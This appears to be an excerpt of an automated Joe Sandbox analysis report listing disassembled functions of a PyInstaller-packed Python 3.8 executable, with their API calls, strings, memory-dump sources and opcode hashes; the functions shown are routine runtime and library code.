Instruction Fuzzy Hash: 04112E61A0AA8291EE558FADE54413967A0EF84BC4F18C531CB4E47B59DF2CE441CB00

Function 00007FF69003707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6900370AD
GetLastError.KERNEL32 ref: 00007FF6900370B9
CloseHandle.KERNEL32 ref: 00007FF6900370D1
CreateFileW.KERNEL32 ref: 00007FF6900370FC
WriteConsoleW.KERNEL32 ref: 00007FF69003711B

Strings

CONOUT$, xrefs: 00007FF6900370DD

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6f4386c37402aa6db2f2534a31a9692c62b08002f2a30eec1ce04c0af795c285
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: C811D321B18A4196E3718B22E85472976A1FB9CBE4F400274EA1DC3798DF3CD400C744

Function 00007FF6900181F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001827A

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018364
FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018375
FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001838A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction ID: 68c38ac7e61ed035dd068d7db7e4c83419e214784005ea1dbc459c319fa64fd5
Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction Fuzzy Hash: B4418162A1968291EAB09B32A5412BA7394FF85FC8F484175DFAD9778DDF3CE601C700

Function 00007FF690018400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF690017B50: GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
Part of subcall function 00007FF690017B50: OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
Part of subcall function 00007FF690017B50: GetTokenInformation.ADVAPI32 ref: 00007FF690017BA8
Part of subcall function 00007FF690017B50: GetLastError.KERNEL32 ref: 00007FF690017BB2
Part of subcall function 00007FF690017B50: GetTokenInformation.ADVAPI32 ref: 00007FF690017BF2
Part of subcall function 00007FF690017B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
Part of subcall function 00007FF690017B50: CloseHandle.KERNEL32 ref: 00007FF690017C26

LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF69001848C
LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF690018495

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF690018462
D:(A;;FA;;;%s), xrefs: 00007FF690018477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6900184A3
S-1-3-4, xrefs: 00007FF690018441

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction ID: 9a7e1bc105953e1ca9a115c05ddec901fe9a170597832da6fcbccac4a3004707
Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction Fuzzy Hash: D3216231A08742A2F660AB30E4557E973A1FF88784F8444B6EA4DC379ADF3CE545C740

Function 00007FF69002A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A5E7
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A61D
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A64A
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A65B
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A66C
SetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A687

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction ID: 1712ff77c2c2f812952db0169e82a01ca582ab220fab28333c2db2069312884c
Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction Fuzzy Hash: F8114D20F4C282A2FA74A7395A4917D6682EF497B4F5847B4E93E877DEDE2CF4024701

Function 00007FF690012300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF690012338
DialogBoxIndirectParamW.USER32 ref: 00007FF6900123FE
DeleteObject.GDI32 ref: 00007FF690012431
DestroyIcon.USER32 ref: 00007FF690012443

Strings

Unhandled exception in script, xrefs: 00007FF690012368

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction ID: 9718d0a7aaf3402a58deb879cf80911b94a83efd374cba32a11739075128efa2
Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction Fuzzy Hash: 15314A26A08A8299EB20EB75E8556F963A1FF88788F440175EA4D87B99DF3CD101C700

Function 00007FF8BFB7E2A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON38 ref: 00007FF8BFB7E2C6
PyLong_FromLong.PYTHON38 ref: 00007FF8BFB7E331
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7E349
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7E35E

Strings

OO:CopyComPointer, xrefs: 00007FF8BFB7E2B9

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Arg_FromLongLong_ParseTuple
String ID: OO:CopyComPointer
API String ID: 1908940310-822416302
Opcode ID: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
Instruction ID: a1269bbc42668fb685e6eac6bf97d8f3b4b6469a22827e2337885d69e2b643b9
Opcode Fuzzy Hash: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
Instruction Fuzzy Hash: 64214C36B09B4285EB169FB9D8501BC2760BF88BE8F494635DB5E47A94CF3CE055C301

Function 00007FF690012760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF69001283B
MessageBoxA.USER32 ref: 00007FF69001284F

Strings

Error, xrefs: 00007FF69001282C
Error/warning (ANSI fallback), xrefs: 00007FF690012843
%s%s: %s, xrefs: 00007FF6900127EC

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction ID: aafc1661d88d4142d1711722eb9821fdca361f80a0f20994158c0d283fc6799f
Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction Fuzzy Hash: 8C216072628A86A1E670DB20F4517EA6364FF88788F401176EB8C93B9DDF7CD645CB40

Function 00007FF8BFB75580 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7968E
PyObject_SetAttr.PYTHON38 ref: 00007FF8BFB796D8
PyDict_Next.PYTHON38 ref: 00007FF8BFB796F5

Strings

too many initializers, xrefs: 00007FF8BFB7967D
args not a tuple?, xrefs: 00007FF8BFB79674

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: AttrDict_Err_NextObject_String
String ID: args not a tuple?$too many initializers
API String ID: 3352738686-2791065560
Opcode ID: 2ff835a78943e0d53156706c5d13c88222d5f76d37cafafde7b459920f154dc0
Instruction ID: e0551fea632b77aaed34afb0f0097511af30594c78d0c3332f9d7dc3027b5a28
Opcode Fuzzy Hash: 2ff835a78943e0d53156706c5d13c88222d5f76d37cafafde7b459920f154dc0
Instruction Fuzzy Hash: 5A213065A08B4281EB508B9DE94477A6B61FB84BF4F144336EB6D43AE9CF7CE449C700

Function 00007FF8BFB7169C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB71660), ref: 00007FF8BFB716C0
PyLong_AsUnsignedLongLongMask.PYTHON38(?,?,?,00007FF8BFB71660), ref: 00007FF8BFB716D1
PyErr_Occurred.PYTHON38(?,?,?,00007FF8BFB71660), ref: 00007FF8BFB716F0
PyErr_SetString.PYTHON38(?,?,?,00007FF8BFB71660), ref: 00007FF8BFB77153

Strings

int expected instead of float, xrefs: 00007FF8BFB77149

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_Long$Long_MaskOccurredStringSubtypeType_Unsigned
String ID: int expected instead of float
API String ID: 3681780221-2411840549
Opcode ID: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
Instruction ID: 681ce9f7e3832852fa1cc8c13991b109dc58363002de12897640769ad404d3e3
Opcode Fuzzy Hash: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
Instruction Fuzzy Hash: 5B011D21B09A4281EB149FADF9440752765BF88BF5B289331DB6E866E1EF2CE494C300

Function 00007FF8BFB724B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB72474), ref: 00007FF8BFB724D4
PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,00007FF8BFB72474), ref: 00007FF8BFB724E5
PyErr_Occurred.PYTHON38(?,?,?,00007FF8BFB72474), ref: 00007FF8BFB72501
PyErr_SetString.PYTHON38(?,?,?,00007FF8BFB72474), ref: 00007FF8BFB776D3

Strings

int expected instead of float, xrefs: 00007FF8BFB776C9

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
String ID: int expected instead of float
API String ID: 2539109060-2411840549
Opcode ID: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
Instruction ID: a8a6a27c8fdcd43582f2d038caad9ba92ef7118cdb42d1fa2fa932def82bb590
Opcode Fuzzy Hash: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
Instruction Fuzzy Hash: 97013121B0DA4285EB149FADE8540793761BF89BE4B189630DB2E826E5EF2CE444C700

Function 00007FF8BFB7282C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB727F0), ref: 00007FF8BFB72850
PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,00007FF8BFB727F0), ref: 00007FF8BFB72861
PyErr_Occurred.PYTHON38(?,?,?,00007FF8BFB727F0), ref: 00007FF8BFB7287D
PyErr_SetString.PYTHON38(?,?,?,00007FF8BFB727F0), ref: 00007FF8BFB779DD

Strings

int expected instead of float, xrefs: 00007FF8BFB779D3

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
String ID: int expected instead of float
API String ID: 2539109060-2411840549
Opcode ID: 4190966989bc7992be6b66f9c704924149e5ca780019c0be67c82ade6ce9eda0
Instruction ID: ba3c6234d49dab934ec718e4926227ba5a9aaca98832ce5f8e257ef40ea60c6a
Opcode Fuzzy Hash: 4190966989bc7992be6b66f9c704924149e5ca780019c0be67c82ade6ce9eda0
Instruction Fuzzy Hash: 48011D21A0DA4381EB149FEDEC441786760BF89BE4B149631DB6E826E1EF2DE444C700

Function 00007FF8BFB7FF88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON38 ref: 00007FF8BFB7FFB5
memcpy.VCRUNTIME140 ref: 00007FF8BFB7FFD9
PyErr_Format.PYTHON38 ref: 00007FF8BFB80007

Strings

expected bytes, %s found, xrefs: 00007FF8BFB7FFA7
bytes too long (%zd, maximum length %zd), xrefs: 00007FF8BFB7FFFD

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_Format$memcpy
String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
API String ID: 437140070-1985973764
Opcode ID: 10fea624f8b6b17753902bd7af56b3cf3030963c9f4ce13bdd61654d3b99bad9
Instruction ID: 89fed5b5002548ce6b5839d8881ffb04c222ff580a808b084171916f488f6aad
Opcode Fuzzy Hash: 10fea624f8b6b17753902bd7af56b3cf3030963c9f4ce13bdd61654d3b99bad9
Instruction Fuzzy Hash: 18014461E0AA87C5EB109BDDD8901B82771BF96BE4F605232CB2D472E1CE2CE099C344

Function 00007FF690028DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF690028DC5
GetProcAddress.KERNEL32 ref: 00007FF690028DDB
FreeLibrary.KERNEL32 ref: 00007FF690028E02

Strings

mscoree.dll, xrefs: 00007FF690028DBC
CorExitProcess, xrefs: 00007FF690028DD4

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 751bbea9ba38823744a614e30e1e809dc607d79709df8e5bfa44484fecd930ba
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 88F0C225B09702A1EA308B34E4457392320EF59765F940675DA6E863F8DF2CD149C300

Function 00007FF690038678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6900386A0
_set_statfp.LIBCMT ref: 00007FF6900386BB
_set_statfp.LIBCMT ref: 00007FF6900386D7
_set_statfp.LIBCMT ref: 00007FF690038713

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: e724984797730fa90e32db63e4073420c7ed40392377d907ada1700d91663afc
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 53116DA3E5CB1221F6761139E857B791141EF5C364F2506F4EA6E867DECE6CE8418310

Function 00007FF69002A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6BF
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6DE
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A706
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A717
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A728

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction ID: dd8688bed2fa91b585d41e487b2597ff2ec506bacc46b63a910c6d50682fe892
Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction Fuzzy Hash: 9F116D20B0C682A2FA78A33959455796191EF9A3A0F1443B4E83D877DEEE2CF9038704

Function 00007FF69002A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF69002A545
FlsSetValue.KERNEL32 ref: 00007FF69002A564
FlsSetValue.KERNEL32 ref: 00007FF69002A58C
FlsSetValue.KERNEL32 ref: 00007FF69002A59D
FlsSetValue.KERNEL32 ref: 00007FF69002A5AE

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
